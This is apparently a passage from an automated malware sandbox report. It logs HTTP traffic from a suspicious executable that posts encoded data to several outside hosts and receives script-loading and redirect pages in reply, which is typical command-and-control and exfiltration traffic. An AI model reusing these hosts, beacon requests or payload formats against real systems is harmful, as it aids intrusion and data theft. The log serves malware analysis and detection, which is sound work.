                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 42 6e 74 6d 78 66 4a 6a 4a 43 6f 51 61 72 77 6e 41 36 4f 46 62 6a 6d 50 67 66 35 62 43 67 6b 54 41 33 68 75 43 6b 34 38 68 6b 43 50 63 6a 70 42 4c 37 45 53 33 72 6d 70 59 51 32 48 4b 4a 4d 46 2b 73 4a 46 6e 78 74 38 34 41 5a 74 6c 56 73 36 4c 7a 52 31 32 5a 55 57 72 75 62 36 34 69 51 66 42 6c 47 31 4b 56 54 6d 61 69 30 35 62 66 50 7a 68 73 34 57 78 4f 7a 54 66 4a 76 68 38 43 4b 31 56 51 76 39 36 4e 62 35 67 48 64 58 78 4d 74 61 2f 75 78 5a 34 47 59 62 41 33 76 34 43 63 46 30 46 4e 48 50 35 49 51 46 75 73 36 62 78 39 6a 76 63 47 4e 36 69 38 2b 7a 6c 71 44 63 79 6c 59 6e 56 41 3d 3d
                                                      Data Ascii: lxRlvTSh=BntmxfJjJCoQarwnA6OFbjmPgf5bCgkTA3huCk48hkCPcjpBL7ES3rmpYQ2HKJMF+sJFnxt84AZtlVs6LzR12ZUWrub64iQfBlG1KVTmai05bfPzhs4WxOzTfJvh8CK1VQv96Nb5gHdXxMta/uxZ4GYbA3v4CcF0FNHP5IQFus6bx9jvcGN6i8+zlqDcylYnVA==
                                                      Jul 3, 2024 17:44:51.149492025 CEST192INHTTP/1.1 200 OK
                                                      Content-Type: text/html
                                                      Content-Length: 96
                                                      Cache-Control: max-age=2592000
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449744162.209.189.212803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:44:53.163980007 CEST693OUTPOST /ooz9/ HTTP/1.1
                                                      Host: www.66hc7.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.66hc7.com
                                                      Referer: http://www.66hc7.com/ooz9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 42 6e 74 6d 78 66 4a 6a 4a 43 6f 51 61 4c 41 6e 43 64 69 46 53 6a 6d 4d 2b 76 35 62 5a 51 6b 58 41 33 74 75 43 68 41 53 69 57 6d 50 63 47 74 42 4b 36 45 53 77 72 6d 70 58 77 32 43 46 70 4e 4a 2b 73 45 79 6e 7a 4a 38 34 45 78 74 6c 58 6b 36 4c 41 35 32 33 4a 55 55 69 4f 62 34 38 69 51 66 42 6c 47 31 4b 52 2b 4e 61 6d 59 35 61 75 2f 7a 67 4a 4d 52 33 2b 7a 51 59 4a 76 68 34 43 4b 78 56 51 75 51 36 4d 48 66 67 46 56 58 78 4e 64 61 78 66 78 57 7a 47 59 64 64 6e 75 73 4c 4a 63 62 4b 75 57 35 34 5a 6b 4d 74 50 2b 37 35 62 79 31 4e 33 73 74 77 38 61 41 34 74 4b 6f 2f 6d 6c 75 4f 4f 45 6c 55 71 73 32 48 5a 36 54 65 49 61 6c 74 4f 5a 44 62 46 67 3d
                                                      Data Ascii: lxRlvTSh=BntmxfJjJCoQaLAnCdiFSjmM+v5bZQkXA3tuChASiWmPcGtBK6ESwrmpXw2CFpNJ+sEynzJ84ExtlXk6LA523JUUiOb48iQfBlG1KR+NamY5au/zgJMR3+zQYJvh4CKxVQuQ6MHfgFVXxNdaxfxWzGYddnusLJcbKuW54ZkMtP+75by1N3stw8aA4tKo/mluOOElUqs2HZ6TeIaltOZDbFg=
                                                      Jul 3, 2024 17:44:53.666820049 CEST192INHTTP/1.1 200 OK
                                                      Content-Type: text/html
                                                      Content-Length: 96
                                                      Cache-Control: max-age=2592000
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449745162.209.189.212803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:44:55.702852964 CEST10775OUTPOST /ooz9/ HTTP/1.1
                                                      Host: www.66hc7.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.66hc7.com
                                                      Referer: http://www.66hc7.com/ooz9/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 42 6e 74 6d 78 66 4a 6a 4a 43 6f 51 61 4c 41 6e 43 64 69 46 53 6a 6d 4d 2b 76 35 62 5a 51 6b 58 41 33 74 75 43 68 41 53 69 57 75 50 63 77 52 42 4c 5a 73 53 78 72 6d 70 65 51 32 44 46 70 4e 41 2b 73 63 2b 6e 7a 45 4c 34 43 31 74 6b 30 38 36 4e 78 35 32 39 4a 55 55 39 65 62 37 34 69 52 48 42 6c 33 38 4b 56 65 4e 61 6d 59 35 61 74 6e 7a 70 38 34 52 31 2b 7a 54 66 4a 76 6c 38 43 4b 56 56 55 43 75 36 4d 44 70 6a 31 31 58 78 74 4e 61 7a 74 5a 57 77 6d 59 66 63 6e 75 6b 4c 4a 59 45 4b 6f 79 50 34 5a 51 31 74 49 32 37 37 36 62 64 55 30 59 4c 7a 76 75 4b 70 66 6a 4f 2b 6b 4e 63 47 2b 67 4d 46 62 73 42 64 62 79 35 57 49 48 71 39 74 45 43 50 77 65 76 7a 75 57 6c 6e 66 73 45 49 38 44 2b 6c 51 35 6e 52 35 75 4a 56 54 46 69 72 6f 4b 78 38 76 62 61 5a 51 4e 73 55 71 70 31 63 52 4a 7a 2f 62 50 67 4d 37 4e 6d 51 6c 4e 51 37 62 41 59 53 58 7a 47 71 4e 55 45 4a 2f 4b 43 6b 56 33 77 76 76 34 35 79 32 50 76 31 56 73 63 6f 56 4f 69 4b 6b 44 33 56 5a 44 51 37 4e 6f 31 69 64 48 4b 6a 4f 56 4d 34 [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=BntmxfJjJCoQaLAnCdiFSjmM+v5bZQkXA3tuChASiWuPcwRBLZsSxrmpeQ2DFpNA+sc+nzEL4C1tk086Nx529JUU9eb74iRHBl38KVeNamY5atnzp84R1+zTfJvl8CKVVUCu6MDpj11XxtNaztZWwmYfcnukLJYEKoyP4ZQ1tI2776bdU0YLzvuKpfjO+kNcG+gMFbsBdby5WIHq9tECPwevzuWlnfsEI8D+lQ5nR5uJVTFiroKx8vbaZQNsUqp1cRJz/bPgM7NmQlNQ7bAYSXzGqNUEJ/KCkV3wvv45y2Pv1VscoVOiKkD3VZDQ7No1idHKjOVM4djbTAeJQ7czu54esU7jk8lW+ZePVxqHPvyqw7n9FzxbmXMvB3tP8+qzcOgSUvSK1lus36NQUWfpYY9ouuE7tgxjZ/YZY/wFKO0+HV/DGN3TJaPX1UZ6xQKUNh3s2OgxKqpNhEdA4cSZabKhwgXLVKnCDbETfvoTzbnc07aNMZCPxEOYKUVviOVL4XCnkvh/TlWUTJqpZtDQ6290paeN9qyh440epYLBdvs+AxDIGv2PKQHhriizgkChXF8zYJmPwacfASizW7CB7x4K2N1qxWuK7OzXbE2K1BTebJezp2wONROUBG/qoNtRt0MxqOkLMdlMqSlvMmXTC3OqEZIDUaSoEycB9nzJ0pK+YADEkynaQmHXl4HwSSI4dWiG01/GIXamAeU+EyfNy+tm5rj33jSH1cyIkoDYcFfJ6xg0+qgEQ0xWZuJ8y1vhsOQqFP+6iIF8FqeUyXgeXdRjZQ7dn9cNukTnSymIBVMEo/dvXfwwulKLVQB0lh8eUg0KZ+iD7E7MXQeDBncPvs2k7fDXGESZJAlFft+CwvSih+Z1eSNbbrGnyh0VzR185x9yvRMtVBdbHKNH8VhRt6unpDxkdeVaAgCGS5KYDVfaWGEKQUm7NiYzaAMilxEqqhf5g3jGVyb1hiUYHIk85/kKz2h7UDgebQeJZzfZpJ9 [TRUNCATED]
                                                      Jul 3, 2024 17:44:56.218441010 CEST192INHTTP/1.1 200 OK
                                                      Content-Type: text/html
                                                      Content-Length: 96
                                                      Cache-Control: max-age=2592000
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.449746162.209.189.212803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:44:58.231606960 CEST413OUTGET /ooz9/?lxRlvTSh=MlFGyqpiH0BFSJI/fef/dCG888BGWBIcHVtVHklmmXS6c3kDIZAL8aaEfl7Aaohh3sZenWVq3ThPiwkLLGk004Us/fWH1X98Emf9JC/rX1g9bPHIk5sfq80=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.66hc7.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:44:58.754859924 CEST192INHTTP/1.1 200 OK
                                                      Content-Type: text/html
                                                      Content-Length: 96
                                                      Cache-Control: max-age=2592000
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.4497473.33.130.190803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:03.829102039 CEST688OUTPOST /el0d/ HTTP/1.1
                                                      Host: www.katgstamps.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.katgstamps.com
                                                      Referer: http://www.katgstamps.com/el0d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 7a 53 54 35 77 2b 55 73 74 59 34 30 38 65 76 44 77 54 2f 78 67 52 57 4f 56 6b 41 63 6a 37 75 57 4f 66 33 65 5a 6f 46 54 78 32 77 79 6a 74 5a 58 78 35 66 45 70 71 59 51 49 66 41 41 57 43 57 6e 4c 42 47 68 38 75 67 2f 6c 46 42 44 4c 34 6e 43 47 45 45 78 4f 6e 4a 6e 4e 52 30 72 4d 77 67 42 46 6a 7a 48 53 39 69 44 74 32 66 6f 78 4d 4a 42 71 36 64 70 30 41 4e 53 38 54 37 74 33 5a 6e 32 44 41 6b 38 57 56 61 62 32 43 70 31 54 68 51 73 30 30 7a 79 72 76 31 56 45 4d 71 79 56 38 46 31 4e 5a 58 44 30 64 35 31 74 44 67 56 55 75 73 53 4d 38 61 57 67 2b 7a 43 46 70 7a 5a 35 69 38 53 32 51 3d 3d
                                                      Data Ascii: lxRlvTSh=zST5w+UstY408evDwT/xgRWOVkAcj7uWOf3eZoFTx2wyjtZXx5fEpqYQIfAAWCWnLBGh8ug/lFBDL4nCGEExOnJnNR0rMwgBFjzHS9iDt2foxMJBq6dp0ANS8T7t3Zn2DAk8WVab2Cp1ThQs00zyrv1VEMqyV8F1NZXD0d51tDgVUusSM8aWg+zCFpzZ5i8S2Q==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.4497483.33.130.190803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:06.358503103 CEST708OUTPOST /el0d/ HTTP/1.1
                                                      Host: www.katgstamps.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.katgstamps.com
                                                      Referer: http://www.katgstamps.com/el0d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 7a 53 54 35 77 2b 55 73 74 59 34 30 39 2b 66 44 78 79 2f 78 78 42 57 4a 4c 30 41 63 36 72 75 53 4f 66 37 65 5a 70 52 44 32 45 55 79 6a 4e 4a 58 2b 62 6e 45 6e 4b 59 51 41 2f 42 45 59 69 57 34 4c 42 4b 66 38 72 59 2f 6c 42 70 44 4c 39 62 43 47 7a 6f 2b 4e 58 4a 70 41 78 30 54 52 67 67 42 46 6a 7a 48 53 39 6d 70 74 32 48 6f 32 38 35 42 73 62 64 71 6f 77 4e 54 37 54 37 74 67 4a 6e 79 44 41 6b 65 57 55 48 77 32 41 68 31 54 6c 59 73 7a 6c 7a 31 68 76 31 54 41 4d 72 39 62 5a 59 75 55 36 33 50 2b 66 39 30 68 7a 6b 7a 52 6f 39 49 64 4e 37 42 79 2b 58 78 59 75 36 74 30 68 42 62 74 63 6c 4c 30 75 31 63 53 78 4c 4b 30 41 65 36 36 61 6d 74 34 39 59 3d
                                                      Data Ascii: lxRlvTSh=zST5w+UstY409+fDxy/xxBWJL0Ac6ruSOf7eZpRD2EUyjNJX+bnEnKYQA/BEYiW4LBKf8rY/lBpDL9bCGzo+NXJpAx0TRggBFjzHS9mpt2Ho285BsbdqowNT7T7tgJnyDAkeWUHw2Ah1TlYszlz1hv1TAMr9bZYuU63P+f90hzkzRo9IdN7By+XxYu6t0hBbtclL0u1cSxLK0Ae66amt49Y=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.4497493.33.130.190803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:08.890325069 CEST10790OUTPOST /el0d/ HTTP/1.1
                                                      Host: www.katgstamps.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.katgstamps.com
                                                      Referer: http://www.katgstamps.com/el0d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 7a 53 54 35 77 2b 55 73 74 59 34 30 39 2b 66 44 78 79 2f 78 78 42 57 4a 4c 30 41 63 36 72 75 53 4f 66 37 65 5a 70 52 44 32 45 63 79 6a 37 46 58 2f 38 4c 45 6d 4b 59 51 4f 66 42 48 59 69 57 78 4c 41 69 44 38 72 45 77 6c 48 74 44 4e 59 58 43 41 42 51 2b 57 6e 4a 70 63 42 30 6f 4d 77 67 55 46 69 44 44 53 38 57 70 74 32 48 6f 32 2f 68 42 73 4b 64 71 71 77 4e 53 38 54 37 68 33 5a 6e 4b 44 41 38 6b 57 55 44 47 33 77 42 31 54 45 6b 73 31 58 62 31 70 76 31 52 46 4d 71 69 62 5a 63 4c 55 36 61 38 2b 65 59 52 68 78 34 7a 63 74 63 75 43 73 44 48 76 76 48 7a 4c 73 36 4f 37 77 68 35 71 2b 63 33 77 75 56 5a 44 44 32 68 76 33 4c 6b 6e 72 32 79 71 71 5a 4d 48 39 34 61 64 45 6d 67 57 55 77 54 36 61 42 6e 6a 77 58 54 49 78 77 42 46 63 49 67 48 52 6b 63 54 74 53 65 30 39 35 41 6e 4d 4f 69 6e 2f 4b 30 4d 6f 72 35 4e 58 31 71 6c 46 64 77 6e 48 43 6b 6d 59 57 6c 53 76 55 5a 44 72 48 50 6b 38 72 35 4d 38 54 72 4a 53 77 62 54 39 46 71 45 44 65 54 69 51 46 69 53 76 38 4e 55 31 59 57 58 42 2f 58 2f [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=zST5w+UstY409+fDxy/xxBWJL0Ac6ruSOf7eZpRD2Ecyj7FX/8LEmKYQOfBHYiWxLAiD8rEwlHtDNYXCABQ+WnJpcB0oMwgUFiDDS8Wpt2Ho2/hBsKdqqwNS8T7h3ZnKDA8kWUDG3wB1TEks1Xb1pv1RFMqibZcLU6a8+eYRhx4zctcuCsDHvvHzLs6O7wh5q+c3wuVZDD2hv3Lknr2yqqZMH94adEmgWUwT6aBnjwXTIxwBFcIgHRkcTtSe095AnMOin/K0Mor5NX1qlFdwnHCkmYWlSvUZDrHPk8r5M8TrJSwbT9FqEDeTiQFiSv8NU1YWXB/X/moH6u7rDj76Ijk4EQRmcNNuRcHqP4prpQn9FpAOK1h47oumu3ZnB4Fv5VjkLwvAjkHBM+xQQZU3gIYvwd13Y5ZonkhME1tDkaCsN6xP69ysq5hxrDoBp+sd+OjpfN01nUFXk0p1DdaqEobfJvrQZ41LgyezWccyAb9SZAjFa4KrZNzAHHgGUPtiADT4jZfGfIfHfPtGKA5sPstYfFKFfDO1KjICr3gHnGWXNigkmcKDYe5MPJOtVe4lqiKSC1fC5zTEkgmjbEAPn2cFffn6qLGlrYAeywFtVNkJ9Wzr3DFCMsT7fsASqwQq+NsNUtzCihfeK5xeEQMsh2KZxipflvRsOcSvVqfsOACgtGmMXepB8XJCItBSiAyrpoeMcAkAOG/DjZXT0X9Zn6HYFP5Tzi804UqQg9erkGySL6FwnhGK+OMTzd6F/G+J+mZYshXlcdIqqi+7YCaO0pW0cq+iuNHdFN61ykDO7nH9ns3EN2/XxicEEy3Mzzkww6tgyxiwnFKEm29AnMbrAMzOE48/HL1kIwVie0HLk+I/zhB4ahFzhgWxvx23RoC1Tv1ci3qag3/gUJrCsDX4QBwKD4fxn/N5wo1FB4ypP1iGv95S5q1zMXkjm7XzreCF/lXfmnDaNWD4JNYIlWV2XWsnfUo7tR2XQRrxEdpY6fa [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.4497503.33.130.190803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:12.135445118 CEST418OUTGET /el0d/?lxRlvTSh=+Q7ZzK8QtvU36dLJnzucjS+TJ0IzvZmyWs7tRfA/z2Vlh6102r3Lp6tJH45cMzuZYwqpgOtAlm44C9LsA0ZyYXRYfzgEIkIQAxK9duS/lWCJ3udFt4tR1RA=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.katgstamps.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:12.643377066 CEST398INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 03 Jul 2024 15:45:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 78 52 6c 76 54 53 68 3d 2b 51 37 5a 7a 4b 38 51 74 76 55 33 36 64 4c 4a 6e 7a 75 63 6a 53 2b 54 4a 30 49 7a 76 5a 6d 79 57 73 37 74 52 66 41 2f 7a 32 56 6c 68 36 31 30 32 72 33 4c 70 36 74 4a 48 34 35 63 4d 7a 75 5a 59 77 71 70 67 4f 74 41 6c 6d 34 34 43 39 4c 73 41 30 5a 79 59 58 52 59 66 7a 67 45 49 6b 49 51 41 78 4b 39 64 75 53 2f 6c 57 43 4a 33 75 64 46 74 34 74 52 31 52 41 3d 26 6b 68 3d 39 50 78 4c 76 68 6f 48 53 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lxRlvTSh=+Q7ZzK8QtvU36dLJnzucjS+TJ0IzvZmyWs7tRfA/z2Vlh6102r3Lp6tJH45cMzuZYwqpgOtAlm44C9LsA0ZyYXRYfzgEIkIQAxK9duS/lWCJ3udFt4tR1RA=&kh=9PxLvhoHS4"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.449751162.0.213.72803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:18.039259911 CEST676OUTPOST /nm4d/ HTTP/1.1
                                                      Host: www.devele.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.devele.top
                                                      Referer: http://www.devele.top/nm4d/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 43 38 79 61 59 6b 30 71 35 49 4f 44 39 47 6a 42 71 33 4d 33 4f 57 62 6b 6b 56 4a 4a 59 57 44 59 70 61 36 37 4a 50 2b 4c 64 34 50 5a 36 31 64 30 36 74 34 79 69 4c 67 69 4f 4d 6f 75 41 56 79 49 35 58 37 58 4e 61 58 30 48 70 69 4e 34 55 55 44 77 6a 4f 51 36 7a 37 62 76 36 46 6d 58 42 64 31 4b 39 50 65 54 5a 4b 51 4a 57 4d 61 61 30 75 52 4d 6b 7a 6f 73 2f 75 4e 38 6a 48 41 34 6e 64 66 39 6c 52 6f 70 4a 6a 47 77 4a 53 66 43 45 58 42 49 45 71 4c 65 38 43 49 5a 70 54 4f 52 76 6f 63 42 38 64 5a 33 45 42 32 4a 70 76 51 43 50 62 56 70 67 71 44 30 4a 30 65 52 49 37 77 6d 37 30 39 71 67 3d 3d
                                                      Data Ascii: lxRlvTSh=C8yaYk0q5IOD9GjBq3M3OWbkkVJJYWDYpa67JP+Ld4PZ61d06t4yiLgiOMouAVyI5X7XNaX0HpiN4UUDwjOQ6z7bv6FmXBd1K9PeTZKQJWMaa0uRMkzos/uN8jHA4ndf9lRopJjGwJSfCEXBIEqLe8CIZpTORvocB8dZ3EB2JpvQCPbVpgqD0J0eRI7wm709qg==
                                                      Jul 3, 2024 17:45:18.656145096 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:18 GMT
                                                      Server: Apache
                                                      Content-Length: 16026
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
